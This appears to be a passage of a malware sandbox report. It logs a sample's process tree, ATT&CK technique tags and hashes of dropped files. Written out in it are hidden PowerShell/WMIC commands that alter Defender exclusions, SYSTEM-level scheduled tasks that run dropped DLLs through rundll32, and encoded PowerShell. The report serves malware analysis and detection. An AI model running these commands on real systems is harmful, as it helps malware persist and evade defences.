C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1688
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DLOGhsaIU\uWPEBc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "WIDyJrOtfliIWWA" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WIDyJrOtfliIWWA2" /F /xml "C:\Program Files (x86)\DLOGhsaIU\VdtzmWp.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WIDyJrOtfliIWWA"3⤵PID:2272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WIDyJrOtfliIWWA"3⤵PID:2756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nxADIXokSRoYuh" /F /xml "C:\Program Files (x86)\dqJSprjCYNjU2\tbTmiIs.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KpIDWATyCmEAP2" /F /xml "C:\ProgramData\lKoxjEGWaXzMwnVB\IFxPdUP.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TavfbLKZPLxPZfDXy2" /F /xml "C:\Program Files (x86)\JoukbHKXhnJgygRymeR\cieDguK.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yjMcJQudiAqgWtKYmHU2" /F /xml "C:\Program Files (x86)\LXFcSqNRPdfiC\oSirhWH.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xOqIMlfoTdTUPfGRn" /SC once /ST 00:27:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jEUQWIQvPKxTkmGv\sVgzpPer\bdqndWv.dll\",#1 /wwyedidpEfG 385137" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xOqIMlfoTdTUPfGRn"3⤵PID:344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QGKRfysOUInPGCvKQ"3⤵PID:2712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 2683⤵
- Loads dropped DLL
- Program crash
PID:1876
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jEUQWIQvPKxTkmGv\sVgzpPer\bdqndWv.dll",#1 /wwyedidpEfG 3851372⤵PID:2992
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jEUQWIQvPKxTkmGv\sVgzpPer\bdqndWv.dll",#1 /wwyedidpEfG 3851373⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:772 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xOqIMlfoTdTUPfGRn"4⤵PID:2148
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {15E1665A-BFC5-4F89-BEB3-133F85073DAB} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1108
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2160
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1632
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2120
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1708
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-90385028913324712151720257405-13191142851541457390-4202038061107455909-2001845145"1⤵PID:2996
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "46315353-1194605923-929818050-993450626-1590189903-167993685917729334191479677869"1⤵PID:1888
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2836
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57e9a602fc5a9be476bbfc337903f3824
SHA165d5d4340c5a660633950dc6d834e326ff890538
SHA25607d64b3109295cbecc95c0e038679f51939324295c2d1977e0428f9d3c2f5f5a
SHA512856b690394acccead7c39a2ac67257a51f78f5eee2e05952619515ad437e48d5e9a59425433653af5a2f7a910f1fc1136403a3a10b86c2ebcdea9a3872c3fa99
-
Filesize
2KB
MD571a3b73162e3b05f2390e0d6aa5f5435
SHA112546c9de50950f456e23ee8974081b33a216548
SHA25639971c9943f4fd7c97690a1811fd464c518b845e97f99207c11a36f4a405d68f
SHA51262ca4d999482de769ee0fc0d97a8c2e6eabfc55c0f239a960dacd14fa5c7aad6ecc17c94d66e6366a7194286f357800ea38d3f4d1481b4dd54a8c9e897fec964
-
Filesize
2KB
MD5673bcec2ab570650d802a6b3785884c6
SHA13bae3f2cb779b961ab9a25863cd9164a685c00ab
SHA2560a266bf40adf74270238c1f734eb08b381ecf4dac4dfeb5981d9f5d4b7632409
SHA51299f83ef26ab97d56be3f3121d2c187c80025709429c6e836bc417802708482d76908675086388ad7deb86b87f249b8c4634924ce4bb5c84ee03ab6915b709570
-
Filesize
2KB
MD5de805443fc7b4b92668bf185923e2368
SHA16bfdfb2b447c1517ba46e0b3c813e19f27a501eb
SHA25638e532384ab901a400aba1276986145e722a17d9be64aff9641fdb75216001cf
SHA512b214ad5332d285d340778f33c49d25d51f85fee68f09a65fdeffb3bab409395706ce12f051c032e2586c66243b8fdf60fd006f29ff5e6061c3a6e484d367ab8b
-
Filesize
2.0MB
MD56380fbe1ceaebd033888fcce754d35ca
SHA144349cc5a1d64a10f5fb549d23440c853a22803d
SHA256f4240e8746754c13336085bde5363baf383bd152006e7164835bfc3dbbc37ac6
SHA512f333fce61634ce7475e169d0b1a3b8995861c2884b22417c9507e7ff66900908b5159b30ff269b703301e53176c9c306cd8eedc8b174f372751c0fe9503603c1
-
Filesize
2KB
MD5a043b9669b43efe756aad66e8f150060
SHA1a625378a42fc9877a9c8ea96fda5d94e03bfe227
SHA2560400df6c693d3fbaec6c86ea21c4b43cbdb516b5a3778e23bd1c32e7590bac29
SHA512d6cc91c3bbd6eda6a6e38a3ce0f56cecde2d694e2a9398420fbce869ec228d03b64148b9bf6976d29aa91dba7e8360001934ec78e5516e435cea2079e15c48b1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5993ad28862562553563e43571a50f050
SHA1ce866af787b3fdfe3cbabff265534d64abfa590f
SHA256372bba3a62af542067b3e40ac8dbb60cbdbacba0fd1fcc10326c5a985aa8774e
SHA5123d73c63d8e1c7e88ec743914de66de8ee3eec389dda2ae25d0394cbd98534fde9e6ecdf372fe531db6773afb7a84fe01491a999b71634a10df074edb7ecfdbfb
-
Filesize
27KB
MD506ea480d1363cb82d3f7b40431e7126b
SHA1ca99341a3be1f76dd9e28630a50694a6c23a4c48
SHA256a80bb7789676668fdc60234b04c6c23fecba20e6594a268679a9408e09d2ae70
SHA512b49ae57389f748c98f16f8d34342ae334ac3b1af9a2a76119835765c05697ea1c000116b3db5a903b667e68bc14d2c3c1eab36642bceaf87b70781fef180001c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4GC2R2VFGLUWP0D18UXO.temp
Filesize7KB
MD52a4e5ffba5c99aa62bfb089cc4cbab24
SHA1702d3f5abec1da2d44d79e6342dc3218a7e98530
SHA25655db7a8020a86f83166f1eb97486f27d878d91e2936ab9bf241e1bb66c7a54ec
SHA5128e2077a88d9f0cfcf2eeefff45b38b2ea04766dd07615f45dffae60cdf87fd01e7d7c92311180900f4c2ab84620d47345fb04453fbae847369c6657c0fc75293
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fd589caec897aa35f695ad0cd0e3efc2
SHA1fdb9e0576c67757377b54f323e22f7cecbb54d1d
SHA256afa1263b83162abf7e12431c6e2cb4ab032895cd1e56db45677f882e110a9c25
SHA5123db740f45a572a203e8de1d885946e0fdf274f93878dc85edab4611d6b339c9da56c0f0e722750d8c1a458b1644e82f2ab42db27256abc80f76bc46907ced400
-
Filesize
7KB
MD514b524706f4271f5d68303b586d55292
SHA1915a2102c6fd1666b78d5f54650918f8d7cb5aab
SHA256f9227d608b98141469a23c4e350a23fd8ea2e5370d093a2bf5c4ee3d4d9fd2d3
SHA5123dea9f228e3af7e40efa3cc78e7256895e1a276e0ce58f57f5cf43176b486e36cfd68e544e8c6b55052d1638a1ea8ce24a8b7d9c84f76c84ec1215b90cf74cd7
-
Filesize
9KB
MD5d71caa5225009b09c8669c3cf2abe333
SHA1d7eb01e6939ab4c9f198ccb0016c104a020f4ebc
SHA2566b93ea5d6c01abd92394b696fb892fd60f92aa20a4d733b0cea9532883a6ec5e
SHA512fc218a9322a7110a718172777c539007e0d2c9b968efbdd472e5543957ad05b97fa9d2b6702db4380e083c77c6e23597292e65c4f4e8cbdefced88d6b8aed319
-
Filesize
6.4MB
MD56d724b96cb86cee81d4fef0572d6f2ee
SHA1a948053a1e8682749f6a4170fc2750e41560dab3
SHA256411b84a9cc0f73fb9385270537c151da2f98e13da679f816614877687a307931
SHA512df5d2b03698067ce2c0a4ad6182faad247c9c860aab8cc0365dd47972f990516b53dc0abc33db557239bb1428ba69716cf0e5ff523ec56bb003fcb39e796aca6
-
Filesize
5KB
MD5b785d35a820e277da2f5c2bc56de981d
SHA140c3523cb1e2729bbd3abf339e17666c573e022a
SHA256570a8b4f372d44be75e8307c4196a4bf00b32d89a73b8f8ab4611274be207a1c
SHA512cce55226a7ed4ca859491bb5408e078174b326e0748262cbcad59c4105150cc1b1f972fde00d03c586213d25563004f6956b1bb447bff712b1d64f3e3ee3ca5a
-
Filesize
6.4MB
MD58714a81de1a9534f2c65020e61dc203d
SHA1dd7b042e1cf5fb383e2a5ed5feb0b2ef52881f93
SHA256cf11171f02b073c4ebbfd85ba3c82854a22c7505e251f6d01702fa66b3be51ca
SHA5127138d31407a71bdfcd8152edb0b8ef4a149246148008206e6e200521acf7cf1859969ed1f443abfcbe76f29bb60bf1819523c9290eda2ba77b790aea716b4199
-
Filesize
6.7MB
MD5461e481b91a66d6d62df3c8bddbd3a94
SHA17df56e81848dcafcb1ec0fb5ebcd05af3a4e16e5
SHA25690fb3644af30c1804c48d3e10350876da24e9c3afeac4e464ad0cab7b5957e31
SHA512b8582306f9f2d6256622c1c01f8bb237879ce46ef98d2c443e408da77db09ef77c40a5040bb2650e20ee12c7b7d425dcafd0f8cf8712c6420c996eed0bfaf103